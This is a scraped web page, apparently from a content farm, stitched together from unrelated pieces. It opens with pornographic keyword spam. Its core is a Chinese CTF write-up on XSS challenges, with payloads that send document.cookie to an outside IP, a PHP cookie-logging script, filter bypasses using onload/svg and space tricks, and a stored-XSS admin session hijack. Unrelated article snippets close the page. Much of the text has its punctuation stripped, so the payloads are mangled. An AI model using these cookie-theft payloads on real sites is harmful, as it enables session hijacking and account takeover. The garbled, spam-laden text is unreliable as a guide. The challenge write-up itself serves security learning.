97色伦色在线综合视频,无玛专区,18videosex性欧美黑色,日韩黄色电影免费在线观看,国产精品伦理一区二区三区,在线视频欧美日韩,亚洲欧美在线中文字幕不卡

成都pc網(wǎng)站建設華亮建設集團公司主頁

鶴壁市浩天電氣有限公司 2026/01/24 17:16:14
成都pc網(wǎng)站建設,華亮建設集團公司主頁,鄭州男科十佳醫(yī)院排名,宣傳片拍攝哪個好web316 1.打開是一個這樣的頁面 可以寫下祝福語#xff0c;既然是xss題目#xff0c;那么直接xss語句#xff0c;看看能不能彈窗 scriptalert(1)/script 發(fā)現(xiàn)可以#xff0c;查看一下他的cookie scriptalert(document.cookie)/script 說…web3161.打開是一個這樣的頁面可以寫下祝福語既然是xss題目那么直接xss語句看看能不能彈窗scriptalert(1)/script發(fā)現(xiàn)可以查看一下他的cookiescriptalert(document.cookie)/script說我不是admin沒有flag2.開始構造方法1可以通過服務器的方式進行外帶scriptlocation.hrefipdocument.cookie/script我這里使用的是python -m http.server 80python的服務scriptlocation.hrefhttp://106.55.49.252/document.cookie/script然后到達服務器這里看響應解碼完得到flag方法2首先在服務器上寫一個php文件?php $cookie $_GET[cookie]; $time date(Y-m-d h:i:s, time()); $log fopen(cookie.txt, a); fwrite($log,$time.: . $cookie . ); fclose($log); ?然后訪問這個php文件scriptlocation.hrefhttp://106.55.49.252/1.php?cookiedocument.cookie/script在傳入這個到服務器那里等15秒3.知識點這題使用的是一個外帶的方法location.href獲取或設置當前頁面URL題目中用到的scriptlocation.hrefhttp://106.55.49.252/document.cookie/script就相當于在管理員門口裝了一個大鏡子當管理員admin要拿鑰匙開門的時候把鑰匙反射到我的屋里了這個就是讓admin的瀏覽器給服務器發(fā)送請求順便給我的服務器也發(fā)送了請求web3171.打開還是那個頁面這題過 濾了script可以換一個屬性使用body屬性body οnlοadlocation.hrefhttp://106.55.49.252/1.php?cookiedocument.cookie/body然后到服務器查看url解碼得到flagonload事件是頁面加載完成觸發(fā)web3181.上題的payload還能使用還能使用svg屬性svg οnlοadlocation.hrefhttp://106.55.49.252/1.php?cookiedocument.cookie/svgweb3191.上題的payload還能使用web3201.這次上題的不行了應該是多了過濾一點一點的刪除看看是哪些過濾了最后發(fā)現(xiàn)是空格被過濾了繞過空格 有 / /**/ 繞過方式考驗對空格的繞過可以使用 / /**/一直到326題全部都是這個payloadweb3271.這題變成存儲型了有發(fā)件人收件人 還有信的內(nèi)容幾個功能那么根據(jù)前面題目的思路這個收件人肯定是admin然后信的內(nèi)容就是xss的內(nèi)容2.開始構造收件人admin發(fā)件人任意然后信的內(nèi)容為下方的scriptlocation.hrefhttp://106.55.49.252/1.php?cookiedocument.cookie/scriptweb3281.打開變成了 登陸頁面登陸admin弱口令發(fā)現(xiàn)不行看到有個注冊功能不讓注冊admin那就隨便注冊一個登陸上去發(fā)現(xiàn)用戶管理只有管理員可看抓包看看是如何驗證身份的發(fā)現(xiàn)是由cookie認證的那么現(xiàn)在唯一能套取admin用戶的cookie的地方應該是由密碼那里可以盜取那么在注冊的時候?qū)⒚艽a設置為盜取admin用戶cookie的payload然后再使用admin的來進行查看用戶管理那么不就成了2.開始構造任意注冊一個用戶密碼為盜取cookie的payload這里需要加上分號因為前面那些題是純HTML屬性所以不需要分號現(xiàn)在這里是JS字符串內(nèi)必須加 分號用來閉合前面的賦值語句并開啟新語句scriptlocation.hrefhttp://106.55.49.252/1.php?cookiedocument.cookie;/script然后登陸完給進行一個替換這邊就變成admin用戶了但是看不到管理頁面而且這是臨時的我們直接到存儲里面修改 cookie然后刷新一下就能看到flag了
版權聲明: 本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。如若內(nèi)容造成侵權/違法違規(guī)/事實不符,請聯(lián)系我們進行投訴反饋,一經(jīng)查實,立即刪除!

做網(wǎng)站如何提需求wordpress文章列表顯示

做網(wǎng)站如何提需求,wordpress文章列表顯示,網(wǎng)站 租用服務器價格,做科技公司的網(wǎng)站公司開源MIDI驅(qū)動完整指南#xff1a;輕松實現(xiàn)Android設備MIDI連接 【免費下載鏈接】USB-MID

2026/01/23 06:31:01

三好街做網(wǎng)站公司網(wǎng)站程序模塊

三好街做網(wǎng)站公司,網(wǎng)站程序模塊,建設銀行網(wǎng)站網(wǎng)頁丟失,山東前十名建筑設計院數(shù)字化轉(zhuǎn)型革命#xff1a;企業(yè)互動解決方案的顛覆性創(chuàng)新 【免費下載鏈接】log-lottery #x1f388;#x1f38

2026/01/21 20:08:01

義烏城市投資建設集團網(wǎng)站二手房交易網(wǎng)站排行

義烏城市投資建設集團網(wǎng)站,二手房交易網(wǎng)站排行,防水網(wǎng)站建設,注冊網(wǎng)站多久居民生活品質(zhì)不斷提升#xff0c;家政服務已經(jīng)從簡單的日常保潔#xff0c;擴展到清潔維護、育嬰照護、居家維修等一整套生活支持體

2026/01/23 04:02:01

東營網(wǎng)站推廣seo管理員

東營網(wǎng)站推廣,seo管理員,如何自己做一個訂單管理系統(tǒng),蕪湖龍湖建設工程有限公司網(wǎng)站YOLOFuse 是否涉及 C# 開發(fā)#xff1f;技術棧全解析 在多模態(tài)感知技術快速演進的今天#xff0c;如何高

2026/01/23 16:02:01